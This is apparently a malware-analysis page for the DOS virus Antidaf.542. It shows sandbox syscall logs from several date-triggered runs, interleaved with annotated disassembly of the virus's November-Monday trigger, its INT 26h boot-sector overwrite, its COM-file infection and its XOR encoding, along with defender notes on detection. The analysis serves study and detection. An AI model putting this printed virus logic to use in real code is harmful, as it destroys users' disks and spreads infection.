
vx.netlux.org/Virus.DOS.CivilWar.Antidaf.542


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:15:32.165451996Z 26 PC: 12a6a | Set disk transfer address
; --- Payload trigger check: disassembly the sandbox attached to the INT 21h AH=2Ah ("Get date") event ---
; After AH=2Ah: CX = year, DH = month (1..12), DL = day, AL = day of week (0 = Sunday).
; Both compares must match for the destructive branch; otherwise control goes to the
; infection routine at 0x12a9e. This run (1980-01-01 per the settings line below) took a jne:
; the next logged event is "Find first file".
2018-12-17T22:15:32.166920473Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb   ; month == 11 (November)?
0x12a7e: jne 0x12a9e                     ; no -> infection routine
0x12a80: cmp al, 1                       ; day of week == 1 (Monday)?
0x12a82: jne 0x12a9e                     ; no -> infection routine
0x12a84: mov ah, 9                       ; INT 21h AH=09h: print '$'-terminated string
0x12a86: lea dx, word ptr [bp + 0x26a]   ; DS:DX -> message (the "Anti-DAF" text logged in the last run on this page)
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19                    ; INT 21h AH=19h: current default drive -> AL (0 = A:)
0x12a8e: int 0x21
0x12a90: mov dx, 0                       ; INT 26h: DX = first logical sector (0 = boot sector)
0x12a93: mov cx, 0x10                    ; INT 26h: CX = 16 sectors
0x12a96: mov bx, 0                       ; INT 26h: DS:BX = source buffer; DS:0000 is presumably the host PSP — not confirmed by the trace
0x12a99: int 0x26                        ; absolute disk write to drive AL: destructive payload, overwrites the first 16 logical sectors of the current drive (boot sector and, on typical FAT layouts, the start of the FAT). Detection: INT 26h with DX=0 issued by an ordinary program is a strong anomaly signal.
0x12a9b: jmp 0x12b84                     ; skip infection; INT 26h leaves a flags word on the stack and no pop is visible before this jmp
0x12a9e: lea dx, word ptr [bp + 0x254]   ; infection routine: DS:DX -> file spec for find-first (the trace shows it matched SLEEP.COM)
0x12aa2: mov ah, 0x4e                    ; INT 21h AH=4Eh: find first file
0x12aa4: xor cx, cx                      ; CX = attribute mask 0: normal files only
0x12aa6: int 0x21                        ; -> "Find first file" event (logged at the return PC 12aa8)
0x12aa8: mov ax, 0x3d02                  ; INT 21h AH=3Dh open, AL=2 read/write
0x12aab: mov dx, 0xfe1e                  ; DS:DX -> filename; presumably DTA+0x1e (where find-first stores the matched name), i.e. the DTA set at PC 12a6a sits at 0xfe00 — TODO confirm
2018-12-17T22:15:32.168546692Z 78 PC: 12aa8 | Find first file
2018-12-17T22:15:32.172455125Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:15:32.17769957Z 87 PC: 12aba | Get or set file date and time
2018-12-17T22:15:32.178915534Z 63 PC: 12ad1 | Read file or device (Read 6 bytes on handle 5)
; --- Infection write-out: disassembly attached to the INT 21h AH=2Ch ("Get time") event ---
; After AH=2Ch: CH = hour, CL = minute, DH = second, DL = hundredths. The host (SLEEP.COM) is already
; open read/write on handle 5 and its first 6 bytes were read at PC 12ad1.
; Defender note: the key is a single clock-derived byte, so the encoded body has at most 256 variants;
; the 29-byte write that precedes the 513-byte body is presumably the unencoded decoder and a better
; static-signature candidate — confirm by diffing several infected hosts.
2018-12-17T22:15:32.182899568Z 44 PC: 12b07 | Get time 0x12b07: mov byte ptr [bp + 0x322], dh   ; save the seconds value
0x12b0b: mov al, dh
0x12b0d: xor al, byte ptr [bp + 0x321]     ; key = seconds XOR byte at [bp+0x321] (that byte's value is not visible in the trace)
0x12b11: mov byte ptr [bp + 0x323], al     ; [bp+0x323] = one-byte XOR key for this infection
0x12b15: lea si, word ptr [bp + 0x123]     ; DS:SI -> body to be copied (0x201 bytes)
0x12b19: mov di, 0xfd00                    ; ES:DI -> scratch buffer near the top of the segment
0x12b1c: mov cx, 0x201                     ; 513 bytes, matching the final "Write 513 bytes" event
0x12b1f: lodsb al, byte ptr [si]
0x12b20: xor al, byte ptr [bp + 0x323]     ; encode each byte with the key
0x12b24: stosb byte ptr es:[di], al
0x12b25: loop 0x12b1f
0x12b27: mov al, byte ptr [bp + 0x323]
0x12b2b: inc al                            ; key+1 is stored back; presumably the decoder compensates — not visible here
0x12b2d: mov byte ptr [bp + 0x323], al
0x12b31: mov ax, 0x4200                    ; INT 21h AH=42h lseek, AL=0 = offset from start of file
0x12b34: call 0x12b89                      ; helper issues the INT 21h (the "Move file pointer" event is logged from PC 12b93 inside it)
0x12b37: mov ah, 0x40                      ; INT 21h AH=40h write to handle
0x12b39: mov cx, 1                         ; 1 byte
0x12b3c: lea dx, word ptr [bp + 0x268]     ; DS:DX -> the byte to write at file offset 0
0x12b40: int 0x21                          ; -> "Write 1 bytes on handle 5"; the log then shows 2- and 3-byte writes (consistent with patching the COM entry, exact bytes not in the trace), a second seek, a 29-byte write and the 513-byte encoded body
2018-12-17T22:15:32.185201075Z 66 PC: 12b93 | Move file pointer
2018-12-17T22:15:32.186481711Z 64 PC: 12b42 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T22:15:32.189082277Z 64 PC: 12b4d | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:15:32.197385373Z 64 PC: 12b58 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:15:32.207182727Z 66 PC: 12b93 | Move file pointer
2018-12-17T22:15:32.208715286Z 64 PC: 12b69 | Write file or device (Write 29 bytes on handle 5)
2018-12-17T22:15:32.212149804Z 64 PC: 12b73 | Write file or device (Write 513 bytes on handle 5)
2018-12-17T22:15:32.229512716Z 87 PC: 12b84 | Get or set file date and time

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2839,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:20.139844629Z 26 PC: 12a6a | Set disk transfer address
; --- Payload trigger check: disassembly the sandbox attached to the INT 21h AH=2Ah ("Get date") event ---
; After AH=2Ah: CX = year, DH = month (1..12), DL = day, AL = day of week (0 = Sunday).
; Both compares must match for the destructive branch; otherwise control goes to the
; infection routine at 0x12a9e. This run (1980-11-01 per the settings line below) passed the
; month check but not the day-of-week check: the next logged event is "Find first file".
2018-12-25T11:47:20.141624494Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb   ; month == 11 (November)?
0x12a7e: jne 0x12a9e                     ; no -> infection routine
0x12a80: cmp al, 1                       ; day of week == 1 (Monday)?
0x12a82: jne 0x12a9e                     ; no -> infection routine
0x12a84: mov ah, 9                       ; INT 21h AH=09h: print '$'-terminated string
0x12a86: lea dx, word ptr [bp + 0x26a]   ; DS:DX -> message (the "Anti-DAF" text logged in the last run on this page)
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19                    ; INT 21h AH=19h: current default drive -> AL (0 = A:)
0x12a8e: int 0x21
0x12a90: mov dx, 0                       ; INT 26h: DX = first logical sector (0 = boot sector)
0x12a93: mov cx, 0x10                    ; INT 26h: CX = 16 sectors
0x12a96: mov bx, 0                       ; INT 26h: DS:BX = source buffer; DS:0000 is presumably the host PSP — not confirmed by the trace
0x12a99: int 0x26                        ; absolute disk write to drive AL: destructive payload, overwrites the first 16 logical sectors of the current drive (boot sector and, on typical FAT layouts, the start of the FAT). Detection: INT 26h with DX=0 issued by an ordinary program is a strong anomaly signal.
0x12a9b: jmp 0x12b84                     ; skip infection; INT 26h leaves a flags word on the stack and no pop is visible before this jmp
0x12a9e: lea dx, word ptr [bp + 0x254]   ; infection routine: DS:DX -> file spec for find-first (the trace shows it matched SLEEP.COM)
0x12aa2: mov ah, 0x4e                    ; INT 21h AH=4Eh: find first file
0x12aa4: xor cx, cx                      ; CX = attribute mask 0: normal files only
0x12aa6: int 0x21                        ; -> "Find first file" event (logged at the return PC 12aa8)
0x12aa8: mov ax, 0x3d02                  ; INT 21h AH=3Dh open, AL=2 read/write
0x12aab: mov dx, 0xfe1e                  ; DS:DX -> filename; presumably DTA+0x1e (where find-first stores the matched name), i.e. the DTA set at PC 12a6a sits at 0xfe00 — TODO confirm
2018-12-25T11:47:20.144288797Z 78 PC: 12aa8 | Find first file
2018-12-25T11:47:20.151109423Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:20.158790692Z 87 PC: 12aba | Get or set file date and time
2018-12-25T11:47:20.161034397Z 63 PC: 12ad1 | Read file or device (Read 6 bytes on handle 5)
; --- Infection write-out: disassembly attached to the INT 21h AH=2Ch ("Get time") event ---
; After AH=2Ch: CH = hour, CL = minute, DH = second, DL = hundredths. The host (SLEEP.COM) is already
; open read/write on handle 5 and its first 6 bytes were read at PC 12ad1.
; Defender note: the key is a single clock-derived byte, so the encoded body has at most 256 variants;
; the 29-byte write that precedes the 513-byte body is presumably the unencoded decoder and a better
; static-signature candidate — confirm by diffing several infected hosts.
2018-12-25T11:47:20.167996692Z 44 PC: 12b07 | Get time 0x12b07: mov byte ptr [bp + 0x322], dh   ; save the seconds value
0x12b0b: mov al, dh
0x12b0d: xor al, byte ptr [bp + 0x321]     ; key = seconds XOR byte at [bp+0x321] (that byte's value is not visible in the trace)
0x12b11: mov byte ptr [bp + 0x323], al     ; [bp+0x323] = one-byte XOR key for this infection
0x12b15: lea si, word ptr [bp + 0x123]     ; DS:SI -> body to be copied (0x201 bytes)
0x12b19: mov di, 0xfd00                    ; ES:DI -> scratch buffer near the top of the segment
0x12b1c: mov cx, 0x201                     ; 513 bytes, matching the final "Write 513 bytes" event
0x12b1f: lodsb al, byte ptr [si]
0x12b20: xor al, byte ptr [bp + 0x323]     ; encode each byte with the key
0x12b24: stosb byte ptr es:[di], al
0x12b25: loop 0x12b1f
0x12b27: mov al, byte ptr [bp + 0x323]
0x12b2b: inc al                            ; key+1 is stored back; presumably the decoder compensates — not visible here
0x12b2d: mov byte ptr [bp + 0x323], al
0x12b31: mov ax, 0x4200                    ; INT 21h AH=42h lseek, AL=0 = offset from start of file
0x12b34: call 0x12b89                      ; helper issues the INT 21h (the "Move file pointer" event is logged from PC 12b93 inside it)
0x12b37: mov ah, 0x40                      ; INT 21h AH=40h write to handle
0x12b39: mov cx, 1                         ; 1 byte
0x12b3c: lea dx, word ptr [bp + 0x268]     ; DS:DX -> the byte to write at file offset 0
0x12b40: int 0x21                          ; -> "Write 1 bytes on handle 5"; the log then shows 2- and 3-byte writes (consistent with patching the COM entry, exact bytes not in the trace), a second seek, a 29-byte write and the 513-byte encoded body
2018-12-25T11:47:20.170374147Z 66 PC: 12b93 | Move file pointer
2018-12-25T11:47:20.184748746Z 64 PC: 12b42 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:47:20.187760632Z 64 PC: 12b4d | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:47:20.191029505Z 64 PC: 12b58 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:20.195667581Z 66 PC: 12b93 | Move file pointer (See above)
2018-12-25T11:47:20.198177867Z 64 PC: 12b69 | Write file or device (Write 29 bytes on handle 5)
2018-12-25T11:47:20.201628976Z 64 PC: 12b73 | Write file or device (Write 513 bytes on handle 5)
2018-12-25T11:47:20.218367013Z 87 PC: 12b84 | Get or set file date and time

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2839,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:20.341303887Z 26 PC: 12a6a | Set disk transfer address
; --- Payload trigger check: disassembly the sandbox attached to the INT 21h AH=2Ah ("Get date") event ---
; After AH=2Ah: CX = year, DH = month (1..12), DL = day, AL = day of week (0 = Sunday).
; Both compares must match for the destructive branch; otherwise control goes to the
; infection routine at 0x12a9e. This run (1980-11-03 per the settings line below) still went to
; "Find first file". 1980-11-03 is a Monday, so if AL had been 1 the payload should have fired —
; worth checking how the sandbox fills AL for AH=2Ah before trusting this run as a negative result.
2018-12-25T11:47:20.343486879Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb   ; month == 11 (November)?
0x12a7e: jne 0x12a9e                     ; no -> infection routine
0x12a80: cmp al, 1                       ; day of week == 1 (Monday)?
0x12a82: jne 0x12a9e                     ; no -> infection routine
0x12a84: mov ah, 9                       ; INT 21h AH=09h: print '$'-terminated string
0x12a86: lea dx, word ptr [bp + 0x26a]   ; DS:DX -> message (the "Anti-DAF" text logged in the last run on this page)
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19                    ; INT 21h AH=19h: current default drive -> AL (0 = A:)
0x12a8e: int 0x21
0x12a90: mov dx, 0                       ; INT 26h: DX = first logical sector (0 = boot sector)
0x12a93: mov cx, 0x10                    ; INT 26h: CX = 16 sectors
0x12a96: mov bx, 0                       ; INT 26h: DS:BX = source buffer; DS:0000 is presumably the host PSP — not confirmed by the trace
0x12a99: int 0x26                        ; absolute disk write to drive AL: destructive payload, overwrites the first 16 logical sectors of the current drive (boot sector and, on typical FAT layouts, the start of the FAT). Detection: INT 26h with DX=0 issued by an ordinary program is a strong anomaly signal.
0x12a9b: jmp 0x12b84                     ; skip infection; INT 26h leaves a flags word on the stack and no pop is visible before this jmp
0x12a9e: lea dx, word ptr [bp + 0x254]   ; infection routine: DS:DX -> file spec for find-first (the trace shows it matched SLEEP.COM)
0x12aa2: mov ah, 0x4e                    ; INT 21h AH=4Eh: find first file
0x12aa4: xor cx, cx                      ; CX = attribute mask 0: normal files only
0x12aa6: int 0x21                        ; -> "Find first file" event (logged at the return PC 12aa8)
0x12aa8: mov ax, 0x3d02                  ; INT 21h AH=3Dh open, AL=2 read/write
0x12aab: mov dx, 0xfe1e                  ; DS:DX -> filename; presumably DTA+0x1e (where find-first stores the matched name), i.e. the DTA set at PC 12a6a sits at 0xfe00 — TODO confirm
2018-12-25T11:47:20.345740812Z 78 PC: 12aa8 | Find first file
2018-12-25T11:47:20.351529955Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:20.358376447Z 87 PC: 12aba | Get or set file date and time
2018-12-25T11:47:20.360155791Z 63 PC: 12ad1 | Read file or device (Read 6 bytes on handle 5)
; --- Infection write-out: disassembly attached to the INT 21h AH=2Ch ("Get time") event ---
; After AH=2Ch: CH = hour, CL = minute, DH = second, DL = hundredths. The host (SLEEP.COM) is already
; open read/write on handle 5 and its first 6 bytes were read at PC 12ad1.
; Defender note: the key is a single clock-derived byte, so the encoded body has at most 256 variants;
; the 29-byte write that precedes the 513-byte body is presumably the unencoded decoder and a better
; static-signature candidate — confirm by diffing several infected hosts.
2018-12-25T11:47:20.36660002Z 44 PC: 12b07 | Get time 0x12b07: mov byte ptr [bp + 0x322], dh   ; save the seconds value
0x12b0b: mov al, dh
0x12b0d: xor al, byte ptr [bp + 0x321]     ; key = seconds XOR byte at [bp+0x321] (that byte's value is not visible in the trace)
0x12b11: mov byte ptr [bp + 0x323], al     ; [bp+0x323] = one-byte XOR key for this infection
0x12b15: lea si, word ptr [bp + 0x123]     ; DS:SI -> body to be copied (0x201 bytes)
0x12b19: mov di, 0xfd00                    ; ES:DI -> scratch buffer near the top of the segment
0x12b1c: mov cx, 0x201                     ; 513 bytes, matching the final "Write 513 bytes" event
0x12b1f: lodsb al, byte ptr [si]
0x12b20: xor al, byte ptr [bp + 0x323]     ; encode each byte with the key
0x12b24: stosb byte ptr es:[di], al
0x12b25: loop 0x12b1f
0x12b27: mov al, byte ptr [bp + 0x323]
0x12b2b: inc al                            ; key+1 is stored back; presumably the decoder compensates — not visible here
0x12b2d: mov byte ptr [bp + 0x323], al
0x12b31: mov ax, 0x4200                    ; INT 21h AH=42h lseek, AL=0 = offset from start of file
0x12b34: call 0x12b89                      ; helper issues the INT 21h (the "Move file pointer" event is logged from PC 12b93 inside it)
0x12b37: mov ah, 0x40                      ; INT 21h AH=40h write to handle
0x12b39: mov cx, 1                         ; 1 byte
0x12b3c: lea dx, word ptr [bp + 0x268]     ; DS:DX -> the byte to write at file offset 0
0x12b40: int 0x21                          ; -> "Write 1 bytes on handle 5"; the log then shows 2- and 3-byte writes (consistent with patching the COM entry, exact bytes not in the trace), a second seek, a 29-byte write and the 513-byte encoded body
2018-12-25T11:47:20.369116669Z 66 PC: 12b93 | Move file pointer
2018-12-25T11:47:20.371595196Z 64 PC: 12b42 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:47:20.374329158Z 64 PC: 12b4d | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:47:20.37688867Z 64 PC: 12b58 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:20.379973395Z 66 PC: 12b93 | Move file pointer (See above)
2018-12-25T11:47:20.381355736Z 64 PC: 12b69 | Write file or device (Write 29 bytes on handle 5)
2018-12-25T11:47:20.383979333Z 64 PC: 12b73 | Write file or device (Write 513 bytes on handle 5)
2018-12-25T11:47:20.399503971Z 87 PC: 12b84 | Get or set file date and time

{"DateBased":true,"Day":3,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2839,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:20.719884105Z 26 PC: 12a6a | Set disk transfer address
; --- Payload trigger check: disassembly the sandbox attached to the INT 21h AH=2Ah ("Get date") event ---
; After AH=2Ah: CX = year, DH = month (1..12), DL = day, AL = day of week (0 = Sunday).
; Both compares must match for the destructive branch; otherwise control goes to the
; infection routine at 0x12a9e. In this run both compares matched: the next logged events are
; "Display string" (AH=09h) and "Get default drive" (AH=19h); the page ends before an INT 26h
; event would appear, so the settings line for this run is not visible.
2018-12-25T11:47:20.721535267Z 42 PC: 12a7b | Get date 0x12a7b: cmp dh, 0xb   ; month == 11 (November)?
0x12a7e: jne 0x12a9e                     ; no -> infection routine
0x12a80: cmp al, 1                       ; day of week == 1 (Monday)?
0x12a82: jne 0x12a9e                     ; no -> infection routine
0x12a84: mov ah, 9                       ; INT 21h AH=09h: print '$'-terminated string
0x12a86: lea dx, word ptr [bp + 0x26a]   ; DS:DX -> message (the "Anti-DAF" text logged right below)
0x12a8a: int 0x21
0x12a8c: mov ah, 0x19                    ; INT 21h AH=19h: current default drive -> AL (0 = A:)
0x12a8e: int 0x21
0x12a90: mov dx, 0                       ; INT 26h: DX = first logical sector (0 = boot sector)
0x12a93: mov cx, 0x10                    ; INT 26h: CX = 16 sectors
0x12a96: mov bx, 0                       ; INT 26h: DS:BX = source buffer; DS:0000 is presumably the host PSP — not confirmed by the trace
0x12a99: int 0x26                        ; absolute disk write to drive AL: destructive payload, overwrites the first 16 logical sectors of the current drive (boot sector and, on typical FAT layouts, the start of the FAT). Detection: INT 26h with DX=0 issued by an ordinary program is a strong anomaly signal.
0x12a9b: jmp 0x12b84                     ; skip infection; INT 26h leaves a flags word on the stack and no pop is visible before this jmp
0x12a9e: lea dx, word ptr [bp + 0x254]   ; infection routine (not reached in this run): DS:DX -> file spec for find-first
0x12aa2: mov ah, 0x4e                    ; INT 21h AH=4Eh: find first file
0x12aa4: xor cx, cx                      ; CX = attribute mask 0: normal files only
0x12aa6: int 0x21
0x12aa8: mov ax, 0x3d02                  ; INT 21h AH=3Dh open, AL=2 read/write
0x12aab: mov dx, 0xfe1e                  ; DS:DX -> filename; presumably DTA+0x1e (where find-first stores the matched name), i.e. the DTA set at PC 12a6a sits at 0xfe00 — TODO confirm
2018-12-25T11:47:20.724259013Z 9 PC: 12a8c | Display string (String= ' The Anti-DAF virus DAF-TRUCKS Eindhoven Hugo vd Goeslaan 1 Postbus 90063 5600 PR Eindhoven, The Netherlands DAF sucks... (c) 1992 Dark Helmet & The Virus Research Centre ')
2018-12-25T11:47:20.744593514Z 25 PC: 12a90 | Get default drive